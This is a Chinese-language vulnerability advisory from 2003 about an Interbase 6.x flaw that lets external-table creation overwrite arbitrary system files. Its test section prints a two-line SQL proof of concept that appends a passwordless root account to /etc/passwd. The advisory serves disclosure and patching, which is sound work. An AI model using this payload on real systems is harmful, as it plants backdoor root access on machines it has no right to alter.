安全研究
安全漏洞
Interbase外部表文件校验操作漏洞
发布日期:2003-04-05
更新日期:2003-04-11
受影响系统:Borland/Inprise Interbase 6.5
Borland/Inprise Interbase 6.4
Borland/Inprise Interbase 6.0
- Cobalt Qube 3.0
- Debian Linux 2.2
- HP HP-UX 11.0
- Mandrake Linux 8.2
- Mandrake Linux 8.1
- Mandrake Linux 8.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
- RedHat Linux 7.3
- RedHat Linux 7.2
- RedHat Linux 7.1
- RedHat Linux 7.0
- RedHat Linux 6.2
- Sun Solaris 8.0
- SuSE Linux 8.0
- SuSE Linux 7.3
- SuSE Linux 7.2
- SuSE Linux 7.1
- SuSE Linux 7.0
- SuSE Linux 6.4
不受影响系统:Borland/Inprise Interbase 7.0
描述:
BUGTRAQ ID:
7291
Interbase是一款由Borland公司开发和维护的数据库软件,可使用在多种Unix和Linux操作系统。
Interbase当建立或更改外部数据库时缺少充分检查,远程或本地攻击者可以利用这个漏洞破坏任意系统文件。
Interbase支持外部文件来存储数据,数据存储以raw格式存储并没有任何访问限制,如果指定的外部文件存储,就会以R/W追加方式打开文件。通过建立外部表文件形式,可以修改系统上可访问的系统文件,因为一般情况下默认以System (Windows)或root(Linux) 帐户运行,可以修改系统任意文件。
<*来源:Kotala Zdenìk (
Zdenek.Kotala@Mius.cz)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=104957649623733&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Kotala Zdenìk (
Zdenek.Kotala@Mius.cz)提供了如下测试方法:
create table test external '/etc/passwd' (id char(80));
insert into test values('r00t::0:0:root:/root:/bin/bash');
建议:
厂商补丁:
Borland/Inprise
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到Interbase 7.0版本:
http://www.borland.com/interbase/浏览次数:3365
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |